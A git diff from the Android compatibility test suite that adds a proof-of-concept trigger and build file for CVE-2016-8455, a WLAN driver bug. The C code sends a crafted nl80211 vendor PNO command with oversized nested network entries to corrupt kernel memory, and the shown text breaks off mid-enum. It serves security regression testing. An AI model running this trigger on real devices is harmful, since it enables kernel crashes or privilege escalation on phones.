+ /* Unsigned 32-bit value; dwell time in ms. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_DWELL_TIME,
+ /* Unsigned 8-bit value; 0: active; 1: passive; N/A for DFS */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_PASSIVE,
+ /* Unsigned 8-bit value; channel class */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_CLASS,
+
+ /* Unsigned 8-bit value; bucket index, 0 based */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_INDEX,
+ /* Unsigned 8-bit value; band. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_BAND,
+ /* Unsigned 32-bit value; desired period, in ms. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_PERIOD,
+ /* Unsigned 8-bit value; report events semantics. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_REPORT_EVENTS,
+ /* Unsigned 32-bit value.
+ * Followed by a nested array of EXTSCAN_CHANNEL_SPEC_* attributes.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_NUM_CHANNEL_SPECS,
+
+ /* Array of QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_* attributes.
+ * Array size: QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_NUM_CHANNEL_SPECS
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC,
+
+ /* Unsigned 32-bit value; base timer period in ms. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_BASE_PERIOD,
+ /* Unsigned 32-bit value; number of APs to store in each scan in the
+ * BSSID/RSSI history buffer (keep the highest RSSI APs).
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_MAX_AP_PER_SCAN,
+ /* Unsigned 8-bit value; in %, when scan buffer is this much full, wake up
+ * APPS.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_REPORT_THRESHOLD_PERCENT,
+ /* Unsigned 8-bit value; number of scan bucket specs; followed by a nested
+ * array of_EXTSCAN_BUCKET_SPEC_* attributes and values. The size of the
+ * array is determined by NUM_BUCKETS.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_NUM_BUCKETS,
+
+ /* Array of QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_* attributes.
+ * Array size: QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_NUM_BUCKETS
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC,
+
+ /* Unsigned 8-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_FLUSH,
+ /* Unsigned 32-bit value; maximum number of results to be returned. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_MAX,
+
+ /* An array of 6 x Unsigned 8-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID,
+ /* Signed 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_LOW,
+ /* Signed 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_HIGH,
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_CHANNEL,
+
+ /* Number of hotlist APs as unsigned 32-bit value, followed by a nested
+ * array of AP_THRESHOLD_PARAM attributes and values. The size of the
+ * array is determined by NUM_AP.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_NUM_AP,
+
+ /* Array of QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_* attributes.
+ * Array size: QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_NUM_CHANNEL_SPECS
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM,
+
+ /* Unsigned 32bit value; number of samples for averaging RSSI. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_RSSI_SAMPLE_SIZE,
+ /* Unsigned 32bit value; number of samples to confirm AP loss. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE,
+ /* Unsigned 32bit value; number of APs breaching threshold. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING,
+ /* Unsigned 32bit value; number of APs. Followed by an array of
+ * AP_THRESHOLD_PARAM attributes. Size of the array is NUM_AP.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP,
+ /* Unsigned 32bit value; number of samples to confirm AP loss. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE,
+
+ /* Unsigned 32-bit value. If max_period is non zero or different than
+ * period, then this bucket is an exponential backoff bucket.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_MAX_PERIOD,
+ /* Unsigned 32-bit value. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_BASE,
+ /* Unsigned 32-bit value. For exponential back off bucket, number of scans
+ * to performed for a given period.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_STEP_COUNT,
+ /* Unsigned 8-bit value; in number of scans, wake up AP after these
+ * many scans.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_REPORT_THRESHOLD_NUM_SCANS,
+
+ /* NL attributes for data used by
+ * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SSID_HOTLIST sub command.
+ */
+ /* Unsigned 32bit value; number of samples to confirm SSID loss. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE,
+ /* Number of hotlist SSIDs as unsigned 32-bit value, followed by a nested
+ * array of SSID_THRESHOLD_PARAM_* attributes and values. The size of the
+ * array is determined by NUM_SSID.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_NUM_SSID,
+ /* Array of QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_* attributes.
+ * Array size: QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_NUM_SSID
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM,
+
+ /* An array of 33 x Unsigned 8-bit value; NULL terminated SSID */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID,
+ /* Unsigned 8-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_BAND,
+ /* Signed 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_LOW,
+ /* Signed 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_HIGH,
+
+ /* Unsigned 32-bit value; a bitmask w/additional extscan config flag. */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CONFIGURATION_FLAGS,
+
+ /* keep last */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_AFTER_LAST,
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX =
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_AFTER_LAST - 1,
+};
+
+#define QCA_NL80211_VENDOR_ID 0x001374
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_PASSPOINT_LIST 70
+
+#define SIR_PASSPOINT_REALM_LEN 256
+#define SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM 16
+#define SIR_PASSPOINT_PLMN_LEN 3
+
+#define QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID 1
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_START 20
+#define PARAM_REQUEST_ID \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID
+#define PARAM_BASE_PERIOD \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_BASE_PERIOD
+#define PARAM_MAX_AP_PER_SCAN \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_MAX_AP_PER_SCAN
+
+#define PARAM_RPT_THRHLD_PERCENT \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_REPORT_THRESHOLD_PERCENT
+#define PARAM_RPT_THRHLD_NUM_SCANS \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_REPORT_THRESHOLD_NUM_SCANS
+
+#define PARAM_NUM_BUCKETS \
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SCAN_CMD_PARAMS_NUM_BUCKETS
+
+#define WIFI_BAND_UNSPECIFIED 0
+enum qca_wlan_vendor_attr_pno_config_params {
+ QCA_WLAN_VENDOR_ATTR_PNO_INVALID = 0,
+ /* NL attributes for data used by
+ * QCA_NL80211_VENDOR_SUBCMD_PNO_SET_PASSPOINT_LIST sub command.
+ */
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM = 1,
+ /* Array of nested QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_*
+ * attributes. Array size =
+ * QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY = 2,
+
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ID = 3,
+ /* An array of 256 x Unsigned 8-bit value; NULL terminated UTF8 encoded
+ * realm, 0 if unspecified.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_REALM = 4,
+ /* An array of 16 x Unsigned 32-bit value; roaming consortium ids
+ * to match, 0 if unspecified.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_CNSRTM_ID = 5,
+ /* An array of 6 x Unsigned 8-bit value; mcc/mnc combination, 0s if
+ * unspecified.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ROAM_PLMN = 6,
+
+ /* NL attributes for data used by
+ * QCA_NL80211_VENDOR_SUBCMD_PNO_SET_LIST sub command.
+ */
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS = 7,
+ /* Array of nested
+ * QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_*
+ * attributes. Array size =
+ * QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST = 8,
+ /* An array of 33 x Unsigned 8-bit value; NULL terminated SSID */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID = 9,
+ /* Signed 8-bit value; threshold for considering this SSID as found,
+ * required granularity for this threshold is 4dBm to 8dBm
+ * This attribute is obsolete.
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_RSSI_THRESHOLD = 10,
+ /* Unsigned 8-bit value; WIFI_PNO_FLAG_XXX */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS = 11,
+ /* Unsigned 8-bit value; auth bit field for matching WPA IE */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT = 12,
+
+ /* Unsigned 8-bit to indicate ePNO type;
+ * It takes values from qca_wlan_epno_type
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_TYPE = 13,
+
+ /* Nested attribute to send the channel list */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_CHANNEL_LIST = 14,
+
+ /* Unsigned 32-bit value; indicates the Interval between PNO scan
+ * cycles in msec
+ */
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_SCAN_INTERVAL = 15,
+ /* Signed 32-bit value; minimum 5GHz RSSI for a BSSID to be
+ * considered
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_MIN5GHZ_RSSI = 16,
+ /* Signed 32-bit value; minimum 2.4GHz RSSI for a BSSID to
+ * be considered
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_MIN24GHZ_RSSI = 17,
+ /* Signed 32-bit value; the maximum score that a network
+ * can have before bonuses
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_INITIAL_SCORE_MAX = 18,
+ /* Signed 32-bit value; only report when there is a network's
+ * score this much higher han the current connection
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_CURRENT_CONNECTION_BONUS = 19,
+ /* Signed 32-bit value; score bonus for all networks with
+ * the same network flag
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_SAME_NETWORK_BONUS = 20,
+ /* Signed 32-bit value; score bonus for networks that are
+ * not open
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_SECURE_BONUS = 21,
+ /* Signed 32-bit value; 5GHz RSSI score bonus
+ * applied to all 5GHz networks
+ */
+ QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS = 22,
+
+ /* keep last */
+ QCA_WLAN_VENDOR_ATTR_PNO_AFTER_LAST,
+ QCA_WLAN_VENDOR_ATTR_PNO_MAX = QCA_WLAN_VENDOR_ATTR_PNO_AFTER_LAST - 1,
+};
+
+#define QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS 7
+#define QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_LIST 69
+#define QCA_WLAN_VENDOR_ATTR_EPNO_MIN5GHZ_RSSI 16
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version);
+int test(void);
+int send_testmode(u_int16_t nlmsg_type, u_int32_t nlmsg_pid, u_int8_t genl_cmd,
+ u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ struct nlattr *rret;
+ struct nlattr *rret2;
+ struct nlattr *rret3;
+ struct nlattr *rret4;
+ unsigned char buf_in[300] = {0xff};
+ int i = 0;
+ unsigned char data_in[SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM];
+
+ unsigned char hb_params[512];
+
+ struct nl80211_sta_flag_update flags;
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_ID, QCA_NL80211_VENDOR_ID);
+ nla_put_u32(msg, NL80211_ATTR_VENDOR_SUBCMD,
+ QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_PNO_SET_LIST);
+
+ rret = nla_nest_start(msg, NL80211_ATTR_VENDOR_DATA);
+
+ if (!rret) {
+ return 1;
+ }
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS, 1);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID,
+ 0x123);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_MIN5GHZ_RSSI, 0x123);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_MIN24GHZ_RSSI, 0x456);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_INITIAL_SCORE_MAX, 0x234);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_CURRENT_CONNECTION_BONUS, 0x111);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_SAME_NETWORK_BONUS, 0x111);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_SECURE_BONUS, 0x111);
+ nla_put_u32(msg, QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS, 0x111);
+
+ rret2 = nla_nest_start(
+ msg, QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST);
+ if (!rret2) {
+ return 1;
+ }
+
+ for (i = 0; i < 32; ++i) {
+ rret3 = nla_nest_start(
+ msg, QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST);
+ if (!rret3) {
+ return 1;
+ }
+
+ nla_put(msg, QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID,
+ IEEE80211_MAX_SSID_LEN, &buf_in);
+ nla_put_u8(msg, QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS,
+ 0x11);
+ nla_put_u8(msg,
+ QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT,
+ 0xff);
+
+ nla_nest_end(msg, rret3);
+ }
+
+ nla_nest_end(msg, rret2);
+ nla_nest_end(msg, rret);
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int fd = 0;
+ int i = 0;
+ int j = 0;
+ int ret = 0;
+ char *mem;
+ int family_id = 0;
+ struct audio_cal_basic *acb;
+ struct sockaddr_nl saddr;
+ int test = 0x1234;
+ if (getuid() != 0) {
+ return -1;
+ }
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_GET_WIPHY 1
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_testmode(family_id, getpid(), NL80211_CMD_VENDOR, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk
new file mode 100644
index 0000000..5ec4302
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk
@@ -0,0 +1,39 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8455
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES := external/libnl/include
+LOCAL_SHARED_LIBRARIES := libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c
new file mode 100644
index 0000000..1f58e23
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c
@@ -0,0 +1,318 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 2048
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+
+typedef enum {
+ /* don't use 0 as a valid subcommand */
+ VENDOR_NL80211_SUBCMD_UNSPECIFIED,
+
+ /* define all vendor startup commands between 0x0 and 0x0FFF */
+ VENDOR_NL80211_SUBCMD_RANGE_START = 0x0001,
+ VENDOR_NL80211_SUBCMD_RANGE_END = 0x0FFF,
+
+ /* define all GScan related commands between 0x1000 and 0x10FF */
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START = 0x1000,
+ ANDROID_NL80211_SUBCMD_GSCAN_RANGE_END = 0x10FF,
+
+ /* define all RTT related commands between 0x1100 and 0x11FF */
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_START = 0x1100,
+ ANDROID_NL80211_SUBCMD_RTT_RANGE_END = 0x11FF,
+
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START = 0x1200,
+ ANDROID_NL80211_SUBCMD_LSTATS_RANGE_END = 0x12FF,
+
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_START = 0x1300,
+ ANDROID_NL80211_SUBCMD_TDLS_RANGE_END = 0x13FF,
+
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START = 0x1400,
+ ANDROID_NL80211_SUBCMD_DEBUG_RANGE_END = 0x14FF,
+
+ /* define all NearbyDiscovery related commands between 0x1500 and 0x15FF */
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_START = 0x1500,
+ ANDROID_NL80211_SUBCMD_NBD_RANGE_END = 0x15FF,
+
+ /* define all wifi calling related commands between 0x1600 and 0x16FF */
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_START = 0x1600,
+ ANDROID_NL80211_SUBCMD_WIFI_OFFLOAD_RANGE_END = 0x16FF,
+
+ /* define all NAN related commands between 0x1700 and 0x17FF */
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_START = 0x1700,
+ ANDROID_NL80211_SUBCMD_NAN_RANGE_END = 0x17FF,
+
+ /* define all packet filter related commands between 0x1800 and 0x18FF */
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_START = 0x1800,
+ ANDROID_NL80211_SUBCMD_PKT_FILTER_RANGE_END = 0x18FF,
+
+ /* This is reserved for future usage */
+
+} ANDROID_VENDOR_SUB_COMMAND;
+
+enum wl_vendor_subcmd {
+ BRCM_VENDOR_SCMD_UNSPEC,
+ BRCM_VENDOR_SCMD_PRIV_STR,
+ GSCAN_SUBCMD_GET_CAPABILITIES = ANDROID_NL80211_SUBCMD_GSCAN_RANGE_START,
+ GSCAN_SUBCMD_SET_CONFIG,
+ GSCAN_SUBCMD_SET_SCAN_CONFIG,
+ GSCAN_SUBCMD_ENABLE_GSCAN,
+ GSCAN_SUBCMD_GET_SCAN_RESULTS,
+ GSCAN_SUBCMD_SCAN_RESULTS,
+ GSCAN_SUBCMD_SET_HOTLIST,
+ GSCAN_SUBCMD_SET_SIGNIFICANT_CHANGE_CONFIG,
+ GSCAN_SUBCMD_ENABLE_FULL_SCAN_RESULTS,
+ GSCAN_SUBCMD_GET_CHANNEL_LIST,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET,
+ ANDR_WIFI_SUBCMD_GET_FEATURE_SET_MATRIX,
+ ANDR_WIFI_RANDOM_MAC_OUI,
+ ANDR_WIFI_NODFS_CHANNELS,
+ ANDR_WIFI_SET_COUNTRY,
+ GSCAN_SUBCMD_SET_EPNO_SSID,
+ WIFI_SUBCMD_SET_SSID_WHITELIST,
+ WIFI_SUBCMD_SET_LAZY_ROAM_PARAMS,
+ WIFI_SUBCMD_ENABLE_LAZY_ROAM,
+ WIFI_SUBCMD_SET_BSSID_PREF,
+ WIFI_SUBCMD_SET_BSSID_BLACKLIST,
+ GSCAN_SUBCMD_ANQPO_CONFIG,
+ WIFI_SUBCMD_SET_RSSI_MONITOR,
+ WIFI_SUBCMD_CONFIG_ND_OFFLOAD,
+ RTT_SUBCMD_SET_CONFIG = ANDROID_NL80211_SUBCMD_RTT_RANGE_START,
+ RTT_SUBCMD_CANCEL_CONFIG,
+ RTT_SUBCMD_GETCAPABILITY,
+ RTT_SUBCMD_GETAVAILCHANNEL,
+ RTT_SUBCMD_SET_RESPONDER,
+ RTT_SUBCMD_CANCEL_RESPONDER,
+ LSTATS_SUBCMD_GET_INFO = ANDROID_NL80211_SUBCMD_LSTATS_RANGE_START,
+ DEBUG_START_LOGGING = ANDROID_NL80211_SUBCMD_DEBUG_RANGE_START,
+ DEBUG_TRIGGER_MEM_DUMP,
+ DEBUG_GET_MEM_DUMP,
+ DEBUG_GET_VER,
+ DEBUG_GET_RING_STATUS,
+ DEBUG_GET_RING_DATA,
+ DEBUG_GET_FEATURE,
+ DEBUG_RESET_LOGGING,
+ DEBUG_TRIGGER_DRIVER_MEM_DUMP,
